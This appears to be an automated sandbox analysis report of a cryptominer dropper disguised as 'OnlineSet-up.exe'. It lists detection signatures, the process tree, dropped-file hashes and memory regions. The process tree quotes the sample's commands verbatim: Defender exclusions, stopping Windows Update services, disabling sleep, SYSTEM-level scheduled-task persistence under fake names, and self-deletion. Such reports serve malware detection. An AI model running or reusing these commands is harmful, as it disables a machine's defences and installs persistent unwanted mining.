Analysis

  • max time kernel
    305s
  • max time network
    318s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-05-2023 20:53

General

  • Target

    Folder/OnlineSet-up.exe

  • Size

    685.3MB

  • MD5

    3890f04895fa29ca24469e4c52e44b1f

  • SHA1

    4c944be0bf5cecff8334d783a387de8043bde9be

  • SHA256

    a1f4e4cd0c62e2cfa8ebdcb90800cdcd028b0302a60714ce8fb122e8d7d4a9fa

  • SHA512

    68b53ea7c5312e14dcae727d14856360e07535a034ce0b899b0714efd1cc3d25d9c778718bddb81267a10a4283278b0a1793e973e4abd95acac2485d72364268

  • SSDEEP

    393216:hrR+SknsQiN9pmGKLnqIgxBnpWmxuis8LrqSGl:VR+SknLepQTqIGnpWHisj

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • XMRig Miner payload 1 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • .NET Reactor proctector 34 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 7 IoCs
  • Themida packer 27 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3128
      • C:\Users\Admin\AppData\Local\Temp\Folder\OnlineSet-up.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder\OnlineSet-up.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
            PID:1488
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5004
            • C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe
              "C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe"
              4⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:3872
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks.exe /create /sc MINUTE /mo 1 /tn "Github" /tr "C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe" /f
                5⤵
                • Creates scheduled task(s)
                PID:4784
            • C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe
              "C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe"
              4⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              PID:3728
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2660
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:380
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:1172
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1960
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:3956
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:4828
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:3596
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4024
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4908
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:832
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1776
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:4260
          • C:\Windows\System32\schtasks.exe
            C:\Windows\System32\schtasks.exe /run /tn "GameBar"
            2⤵
              PID:4432
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
              2⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              PID:1812
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3356
              • C:\Windows\System32\sc.exe
                sc stop UsoSvc
                3⤵
                • Launches sc.exe
                PID:4500
              • C:\Windows\System32\sc.exe
                sc stop WaaSMedicSvc
                3⤵
                • Launches sc.exe
                PID:1256
              • C:\Windows\System32\sc.exe
                sc stop wuauserv
                3⤵
                • Launches sc.exe
                PID:636
              • C:\Windows\System32\sc.exe
                sc stop bits
                3⤵
                • Launches sc.exe
                PID:3988
              • C:\Windows\System32\sc.exe
                sc stop dosvc
                3⤵
                • Launches sc.exe
                PID:5000
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4252
              • C:\Windows\System32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                  PID:1504
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-dc 0
                  3⤵
                    PID:2688
                  • C:\Windows\System32\powercfg.exe
                    powercfg /x -standby-timeout-ac 0
                    3⤵
                      PID:1420
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                        PID:1716
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }
                      2⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3628
                    • C:\Windows\System32\conhost.exe
                      C:\Windows\System32\conhost.exe
                      2⤵
                        PID:1168
                      • C:\Windows\System32\dwm.exe
                        C:\Windows\System32\dwm.exe
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4608
                    • C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe
                      "C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe"
                      1⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:2404
                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:3528
                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:812
                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:4572
                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:1844

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

                      Filesize

                      5.8MB

                      MD5

                      8efb0a8fd404d31541b7592cae776e58

                      SHA1

                      1be6c32c0a13a1f76b9eeed08b46192ceb197d29

                      SHA256

                      6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0

                      SHA512

                      a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6

                    • C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

                      Filesize

                      5.8MB

                      MD5

                      8efb0a8fd404d31541b7592cae776e58

                      SHA1

                      1be6c32c0a13a1f76b9eeed08b46192ceb197d29

                      SHA256

                      6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0

                      SHA512

                      a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      944B

                      MD5

                      d28a889fd956d5cb3accfbaf1143eb6f

                      SHA1

                      157ba54b365341f8ff06707d996b3635da8446f7

                      SHA256

                      21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                      SHA512

                      0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                    • C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe

                      Filesize

                      5.8MB

                      MD5

                      8efb0a8fd404d31541b7592cae776e58

                      SHA1

                      1be6c32c0a13a1f76b9eeed08b46192ceb197d29

                      SHA256

                      6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0

                      SHA512

                      a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6

                    • C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe

                      Filesize

                      5.8MB

                      MD5

                      8efb0a8fd404d31541b7592cae776e58

                      SHA1

                      1be6c32c0a13a1f76b9eeed08b46192ceb197d29

                      SHA256

                      6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0

                      SHA512

                      a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6

                    • C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe

                      Filesize

                      5.8MB

                      MD5

                      8efb0a8fd404d31541b7592cae776e58

                      SHA1

                      1be6c32c0a13a1f76b9eeed08b46192ceb197d29

                      SHA256

                      6bd3020ed8e6bb3df3f419ecdba60fdf30a66d5ea43252329962bf29201131a0

                      SHA512

                      a068e2b0824caf2032443f9717126aff6296585615f19b06e9c44c37554c422e30c50ad311717dca181ea0657739368845fc10cd6f412e38b11b1c2cdf14c3f6

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c2kqlxkt.v5f.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Local\analworker\Admin@[email protected]\Processes.txt

                      Filesize

                      4KB

                      MD5

                      a5d166b8c174d1530f6520635ad7c260

                      SHA1

                      762cb38862a3fd6ee8ef3fcf268aa35e32f22ba1

                      SHA256

                      68511d4448840dbabebf5f50018bc43848a1d30c6d489ec2d613048318bd102a

                      SHA512

                      b4320f0271aea782190023da9dccf22b309e4af7a5c1762d349d1bdcdae469cc80fef95016a1ccf2dd733a50cc8f5b8ccbb83e0f155ae9c611515b0903b8c5e5

                    • C:\Users\Admin\AppData\Local\analworker\Admin@[email protected]\Software.txt

                      Filesize

                      4KB

                      MD5

                      ba677776671f5a143438935d549bccc2

                      SHA1

                      cb4efbb91ae2dfc3ddc24a5e242619168ac57587

                      SHA256

                      df5b6d7f6f0fbcc13b3bb8f168cb5cc0c9e80f6c5845f844c8ea675221e7e2c1

                      SHA512

                      7099cacb87ca621e8eb9c60253d307efb614afe1de5f0c3966eecf0da64d8b54acc7847069ba2d9bf44bd39ad270e6fe79ae1b9c6b296cdb137a1b1a9aedc721

                    • C:\Users\Admin\AppData\Local\analworker\msgid.dat

                      Filesize

                      13B

                      MD5

                      ddce339c651cba9679e98cf57560521c

                      SHA1

                      fc0e9b2a6e9a6a040dac8ad04a3167cde86a78a4

                      SHA256

                      fdc827169da5fae6bdc3b0db350d275d30ffc08853fe498d935357d3f14486b2

                      SHA512

                      785c0c638ce7567718fc6da60dda5a18acd6fe389496b405eb749ce8af60cd9e84049e5ae9150f4559169750470b0c7055828371e3233bc4caeaf03dbbe77ad8

                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe

                      Filesize

                      3.2MB

                      MD5

                      9cc257fc84391b1bf3c6e44876277785

                      SHA1

                      3b33f244f578ab0ee9dc8926c754f0116c9ffa41

                      SHA256

                      8cc1e0b64ebc839c61a0e4d6edd5b3391350be0de00f5f1d273261ed8301999a

                      SHA512

                      c3e4356a1430670e8c6b649e9cf2245182ac950541f459b56764f3d9ac7284195c7d0a0c1ffbfa12b9acdb8891c14358cd798fdb28aa84c4f56317154a656948

                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      4KB

                      MD5

                      bdb25c22d14ec917e30faf353826c5de

                      SHA1

                      6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                      SHA256

                      e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                      SHA512

                      b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      b42c70c1dbf0d1d477ec86902db9e986

                      SHA1

                      1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                      SHA256

                      8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                      SHA512

                      57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                    • memory/812-9063-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/812-9058-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/1776-8952-0x000001DE8DFE0000-0x000001DE8DFF0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1776-8948-0x000001DE8DFE0000-0x000001DE8DFF0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1776-8949-0x000001DE8DFE0000-0x000001DE8DFF0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1776-8950-0x000001DE8DFE0000-0x000001DE8DFF0000-memory.dmp

                      Filesize

                      64KB

                    • memory/1812-8997-0x000001574C9A0000-0x000001574C9AA000-memory.dmp

                      Filesize

                      40KB

                    • memory/1812-9001-0x000001574CB50000-0x000001574CB6A000-memory.dmp

                      Filesize

                      104KB

                    • memory/1812-8996-0x00007FF481B30000-0x00007FF481B40000-memory.dmp

                      Filesize

                      64KB

                    • memory/1812-8998-0x000001574CB10000-0x000001574CB2C000-memory.dmp

                      Filesize

                      112KB

                    • memory/1812-8999-0x000001574CAF0000-0x000001574CAFA000-memory.dmp

                      Filesize

                      40KB

                    • memory/1812-8995-0x000001574BC20000-0x000001574BC30000-memory.dmp

                      Filesize

                      64KB

                    • memory/1812-9002-0x000001574CB00000-0x000001574CB08000-memory.dmp

                      Filesize

                      32KB

                    • memory/1812-8992-0x000001574C8C0000-0x000001574C8DC000-memory.dmp

                      Filesize

                      112KB

                    • memory/1812-8993-0x000001574BC20000-0x000001574BC30000-memory.dmp

                      Filesize

                      64KB

                    • memory/1812-8994-0x000001574BC20000-0x000001574BC30000-memory.dmp

                      Filesize

                      64KB

                    • memory/1812-9004-0x000001574CB40000-0x000001574CB4A000-memory.dmp

                      Filesize

                      40KB

                    • memory/1812-9003-0x000001574CB30000-0x000001574CB36000-memory.dmp

                      Filesize

                      24KB

                    • memory/1844-9110-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/1844-9115-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/2404-8963-0x00007FF6EB640000-0x00007FF6EC193000-memory.dmp

                      Filesize

                      11.3MB

                    • memory/2404-9040-0x00007FF6EB640000-0x00007FF6EC193000-memory.dmp

                      Filesize

                      11.3MB

                    • memory/2660-8925-0x0000014059B30000-0x0000014059B52000-memory.dmp

                      Filesize

                      136KB

                    • memory/3528-8967-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/3528-8973-0x00007FF703550000-0x00007FF703CED000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/3628-9028-0x00000227A6500000-0x00000227A6510000-memory.dmp

                      Filesize

                      64KB

                    • memory/3628-9029-0x00000227A6500000-0x00000227A6510000-memory.dmp

                      Filesize

                      64KB

                    • memory/3628-9030-0x00000227A6500000-0x00000227A6510000-memory.dmp

                      Filesize

                      64KB

                    • memory/3628-9031-0x00000227A6500000-0x00000227A6510000-memory.dmp

                      Filesize

                      64KB

                    • memory/3628-9032-0x00000227A6500000-0x00000227A6510000-memory.dmp

                      Filesize

                      64KB

                    • memory/3728-8924-0x00007FF7F2350000-0x00007FF7F2EA3000-memory.dmp

                      Filesize

                      11.3MB

                    • memory/3728-8957-0x00007FF7F2350000-0x00007FF7F2EA3000-memory.dmp

                      Filesize

                      11.3MB

                    • memory/3728-8917-0x00007FF7F2350000-0x00007FF7F2EA3000-memory.dmp

                      Filesize

                      11.3MB

                    • memory/3872-8903-0x00007FF77E800000-0x00007FF77EF9D000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/3872-8922-0x00007FF77E800000-0x00007FF77EF9D000-memory.dmp

                      Filesize

                      7.6MB

                    • memory/4532-154-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-184-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-168-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-166-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-164-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-162-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-160-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-158-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-156-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-186-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-172-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-152-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

                      1.3MB

                    • memory/4532-174-0x000000001D7B0000-0x000000001D900000-memory.dmp

                      Filesize

